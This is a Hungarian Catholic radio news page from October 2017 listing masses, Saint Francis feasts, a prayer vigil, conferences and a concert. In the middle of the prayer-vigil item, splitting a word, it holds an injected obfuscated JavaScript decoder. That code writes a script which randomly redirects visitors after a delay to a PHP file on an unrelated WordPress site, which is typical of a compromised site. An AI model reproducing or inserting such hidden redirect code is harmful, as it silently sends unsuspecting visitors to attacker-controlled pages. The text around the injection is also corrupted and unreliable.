2017. október 3. – Hírek és programajánló

H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán  Kilyénfalván tartják az örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, fejezzük ki ily módon is Krisztushoz való hűségünket és ragaszkodásunkat.

Szentmise a székesegyházban
Boldog Bogdánffy Szilárd ünnepén ma délután hat órakor Böcskei László megyés püspök szentmisét mutat be a nagyváradi székesegyházban.

Szent Ferenc ünnepe
A gyulafehérvári főegyházmegyében a nagytusnádi templomban az ünnepi búcsús szentmisét holnap délután öt órakor tartják. A szentmise főcelebránsa Tamás József püspök, szónoka pedig Urbán Erik ferences atya, a csíksomlyói kegytemplom igazgatója.
A csíksomlyói kegytemplomban ma emlékeznek meg Assisi Szent Ferenc tranzitusáról, égbe költözéséről. Az ünnepi szentmise délután hat órakor kezdődik.
Assisi Szent Ferenc ünnepének előestéjén, ma Székelyudvarhelyen a ferencesek templomában a délután hat órakor kezdődő szentmise keretében emlékeznek meg Szent Ferenc elszenderüléséről, tranzitusáról.
Szintén ma délután öt órától ünnepi szentmise lesz a szárhegyi ferences templomban, amelynek keretében megemlékeznek Szent Ferenc tranzitusáról.
Kolozsváron, a ferences templomban holnap Assisi Szent Ferenc ünnepén a búcsús szentmisét délután hat órától tartják.
A szatmári egyházmégyében a borsabányai templom búcsúja október 7-én, szombaton lesz megtartva. Délelőtt tíz órakor román, déli tizenkét órakor pedig magyar nyelven mutatják be a szentmisét. Köveslázon pedig október 8-án, vasárnap délután két órakor kezdődik a Szent Ferenc búcsús szentmise.

Engesztelő imavirrasztás Székelyudvarhelyen
Az erdélyi Mária Rádió székelyudvarhelyi stúdiójának kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, éjjel tizenegy órától szentmisét mutatnak be. Október 4-én hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek.
A kápolnában minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van. Várják az Istent imádni, engesztelni vágyó hívőket.

Mária Rádiós találkozók
Október hónap elején újra találkozunk önkénteseinkkel, hallgatóinkkal. Az első találkozó október 4-én, szerdán délután hat órától lesz Nagyváradon, majd október 5-én Nagykárolyban, a Szent László közösségi házban várjuk önkénteseinket délután négy órára. A találkozók Gyergyószentmiklóson folytatódnak október 6-án, pénteken, ahol délelőtt tíz órára várjuk az önkénteseket a Szent Miklós plébánia hittantermébe. Október 7-én, elsőszombaton, délután négy órakor lesz a találkozó Csíksomlyón, a régi nyomda épületébe, ahol több munkatárs is jelen lesz. A további helyszínekről és időpontokról hírműsorainkban tájékoztatjuk hallgatóinkat.

Hálaadó szentmise a Vártemplomban
A Szent László Regionális Találkozók zárásaként október 5-én, csütörtökön délután öt órakor Böcskei László megyés püspök hálaadó szentmisét mutat be Szent László király egykori sírjának közelében, a nagyváradi Vártemplomban. A szentmise keretében minden régió 25 fős képviselete összegezni fogja a találkozók tapasztalatait, majd a jelenlévők elköteleződésük kifejezéseként, a megújulás vágyával ünnepélyes hitvallást tesznek. Jó alkalom ez a nap arra, hogy egyházmegye- és városalapító szentünk közbenjárását kérjük közösségeink, családjaink és saját magunk életére. Akik nem tudnak részt venni a szentmisén bekapcsolódhatnak a rádiónk hullám hosszán keresztül!

Együtt a fogyatékkal élőkért konferencia
Tizenegyedik éve szervezik meg október 6-7. között Csíkszeredában az Együtt a fogyatékkal élőkért című konferenciát. A segítő szakmában dolgozó civil szervezetek munkatársait, szakembereket, szülőket és fogyatékkal élőket megszólító rendezvény helyszínéül az Apáczai Csere János Pedagógusok Háza szolgál (Taploca utca 20. szám).
A 2017-es konferencia központi témája a speciális nevelési igényű fiatal felnőttek, a családból való kilépés, önálló élet megkezdése, munkavállalás. Mottója: Segíts és engedj, hogy szabad legyek! „… hogy életük legyen” ( Jn. 10,10) Bővebb információ a caritas-ab.ro oldalon olvasható.

Kamarakoncert a Püspöki Palota Dísztermében
Október 8-án, vasárnap este hét órakor a Fonte di Gioia együttes és a meghívottjai adnak kamarakoncertet a Püspöki Palota Dísztermében. Műsoron M. Corrette, G.F. Händel, J. Rosenmüller, H. Purcell és T. Merula művei. A belépés díjtalan, várnak minden érdeklődőt.

Utógondózió konferencia – Országos találkozó
A Bonus Pastor Alapítvány 2017. október 13-15. között, Csíkszeredában tartja az idei év harmadik országos találkozóját.
A találkozó címe: A józanság kultúrája
Helyszín: Csíkszereda, Református imaház (Petőfi u. 5 sz.)
Jelentkezni 2017. október 10-ig lehet a 0265 254 460-as telefonszámon. Bővebben a bonuspastor.ro honlapon találhatnak.

Időjárás: Hideg reggelre ébredhettünk beborul az ég, a déli óráktól kezdve északnyugat felől egyre többfelé érkezik eső, zápor, a délkeleti tájakra viszont csak este, éjjel ér oda a csapadék. Ismét feltámad a szél. Napközben 15-21 fokot mérhetünk, délen, délnyugaton várható a legmelegebb.

MRE - Hírszolgálat, 2017. október 3

About the author

maradmin

Leave a Comment